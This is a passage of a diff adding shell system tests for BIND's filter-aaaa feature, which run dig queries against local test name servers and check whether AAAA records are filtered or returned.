copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named1.conf.in ns1/named.conf +copy_setports ns2/named1.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf +copy_setports ns4/named1.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +(cd ns1 && $SHELL -e sign.sh) +(cd ns4 && $SHELL -e sign.sh) diff --git a/bin/tests/system/filter-aaaa/tests.sh b/bin/tests/system/filter-aaaa/tests.sh new file mode 100644 index 0000000..a173f6a --- /dev/null +++ b/bin/tests/system/filter-aaaa/tests.sh @@ -0,0 +1,1419 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +for conf in conf/good*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +# +# Authoritative tests against: +# filter-aaaa-on-v4 yes; +# filter-aaaa { 10.53.0.1; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::5 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0," dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.2 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns1.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.2 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns1.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6 ($n)" +if testsock6 fd92:7065:b8e:ffff::1 +then +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep 2001:db8::6 dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)" +ret=0 +$DIG $DIGOPTS +add ns unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep AAAA dig.out.ns1.test$n > /dev/null 2>&1 && ret=1 +grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep "ADDITIONAL: 2" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, signed ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.1 @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv6 ($n)" +if testsock6 fd92:7065:b8e:ffff::1 +then +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::1 > dig.out.ns1.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +grep "AUTHORITY: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +# +# Authoritative tests against: +# filter-aaaa-on-v4 break-dnssec; +# filter-aaaa { 10.53.0.4; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "AUTHORITY: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep ::5 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "AUTHORITY: 0," dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.2 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns4.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns4.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns4.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.2 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns4.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6 with break-dnssec ($n)" +if testsock6 fd92:7065:b8e:ffff::4 +then +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep 2001:db8::6 dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add ns unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep AAAA dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.4 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv6, with break-dnssec ($n)" +if testsock6 fd92:7065:b8e:ffff::4 +then +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::4 @fd92:7065:b8e:ffff::4 > dig.out.ns4.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns4.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + + +# +# Recursive tests against: +# filter-aaaa-on-v4 yes; +# filter-aaaa { 10.53.0.2; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep ::5 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist, signed and DO set, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.signed +dnssec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.1 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b 10.53.0.1 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns2.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv6, recursive ($n)" +if testsock6 fd92:7065:b8e:ffff::2 +then +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep 2001:db8::6 dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)" +ret=0 +$DIG $DIGOPTS +add ns unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep AAAA dig.out.ns2.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, recursive ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, signed, recursive ($n)" +ret=0 +# we need to prime the cache with addresses for the MX, since additional +# section data won't be included unless it's validated, and that doesn't +# necessarily happen otherwise. +$DIG $DIGOPTS +dnssec mx.signed @10.53.0.2 > /dev/null +$DIG $DIGOPTS +dnssec mx.signed aaaa @10.53.0.2 > /dev/null +$DIG $DIGOPTS +add +dnssec mx signed -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, recursive, over IPv6 ($n)" +if testsock6 fd92:7065:b8e:ffff::2 +then +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +else +echo_i "skipped." +fi + +# +# Recursive tests against: +# filter-aaaa-on-v4 break-dnssec; +# filter-aaaa { 10.53.0.3; }; +# +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.signed -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::2 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep ::5 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi 